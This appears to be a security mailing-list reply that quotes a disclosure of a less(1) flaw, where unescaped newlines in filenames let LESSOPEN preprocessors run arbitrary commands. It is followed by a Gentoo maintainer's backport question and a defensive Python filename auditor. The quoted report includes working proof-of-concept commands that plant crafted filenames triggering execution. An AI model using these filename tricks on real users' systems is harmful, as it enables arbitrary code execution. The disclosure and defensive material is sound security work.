Jakub Wilk <jw...@jwilk.net> writes:

> less(1) does not correctly escape newlines in pathnames when
> constructing command line of the input preprocessor. If a user ran
> less(1) on files with untrusted names, this could result in execution
> of arbitrary code.
>
> The input preprocessor is enabled by the LESSOPEN environment variable.
> But if you didn't set it, don't worry, because zless(1) (or xzless(1),
> or zstdless(1)) sets it for you:
>
>    $ echo 'cowsay pwned' > './\' && touch "$(printf '\n|sh')"
>    $ zless ./*
>     _______
>    < pwned >
>     -------
>            \   ^__^
>             \  (oo)\_______
>                (__)\       )\/\
>                    ||----w |
>                    ||     ||
>    ./
>    |sh (file 1 of 2) (END) - Next: ./\
>
> On Ubuntu systems, $LESSOPEN is set in ~/.bashrc by default, so the
> bug can be exploited even without the wrapper:
>

Unfortunately, it looks like we're the same in Gentoo.

>    $ mkdir m "$(printf '\n|m')" && touch "$(printf '\n|m/oo')" && echo 'cowsay pwned' > m/oo && chmod +x m/oo
>    $ less ./*/*
>     _______
>    < pwned >
>     -------
>            \   ^__^
>             \  (oo)\_______
>                (__)\       )\/\
>                    ||----w |
>                    ||     ||
>    ./
>    |m/oo (file 1 of 2) (END) - Next: ./m/oo
>
>
> Upstream fix:
> https://github.com/gwsw/less/commit/007521ac3c95bc76

Thanks.

Any idea if upstream plans to backport it? I think it doesn't apply cleanly
to the last release, 643 (653 is a beta), but I'll try to do it now.
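The root cause in the report is that pathnames were interpolated into a shell command line with an escaping routine that did not account for newlines. The following is an added example (not code from the thread, from less, or from the distribution wrappers) showing the two things an administrator can do about this class of bug on their own side: flag filenames that contain characters outside a conservative safe set, and verify that a quoting routine (here Python's `shlex.quote`, which single-quotes the whole token) survives a round trip through `sh` unchanged even when the name contains a newline and a pipe. The sample names are constructed for the demonstration.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Constructed sample filenames: one benign and two shaped like the
# pathnames in the report (a newline followed by a pipe, and a bare backslash).
SAMPLE_NAMES = ["normal.txt", "\n|sh", "./\\"]

# Conservative allow-list: anything outside this set is worth a second look
# before the name is handed to a tool that builds shell command lines.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._/+-]+$")


def risky_names(names):
    """Return the names that contain characters outside the safe set.

    Newlines, carriage returns and NULs are the ones most often missed by
    hand-written escapers, so they are always reported."""
    flagged = []
    for name in names:
        if any(c in name for c in "\n\r\0") or not SAFE_NAME.match(name):
            flagged.append(name)
    return flagged


def audit_tree(root):
    """Walk a directory tree and return relative paths with risky names."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            rel = os.path.relpath(os.path.join(dirpath, entry), root)
            if risky_names([rel]):
                found.append(rel)
    return sorted(found)


def shell_roundtrip(name):
    """Quote `name` with shlex.quote, pass it through sh, and return what
    the shell actually delivered as the argument.

    If quoting is correct the result equals `name` exactly, with no
    command substitution or pipeline having been triggered."""
    cmd = "printf '%s' " + shlex.quote(name)
    out = subprocess.run(["sh", "-c", cmd], capture_output=True, check=True)
    return out.stdout.decode()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for n in SAMPLE_NAMES:
            open(os.path.join(tmp, n), "w").close()
        print("risky entries:", [repr(p) for p in audit_tree(tmp)])
    for n in SAMPLE_NAMES:
        print(repr(n), "round-trips:", shell_roundtrip(n) == n)
```

`risky_names` is the cheap pre-check to run over a download or upload directory before pointing a `LESSOPEN`-enabled pager (or any other preprocessor-driven tool) at `./*`; `shell_roundtrip` is the property a fixed escaper has to satisfy, and the newline case is the one a naive backslash-escaper fails.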
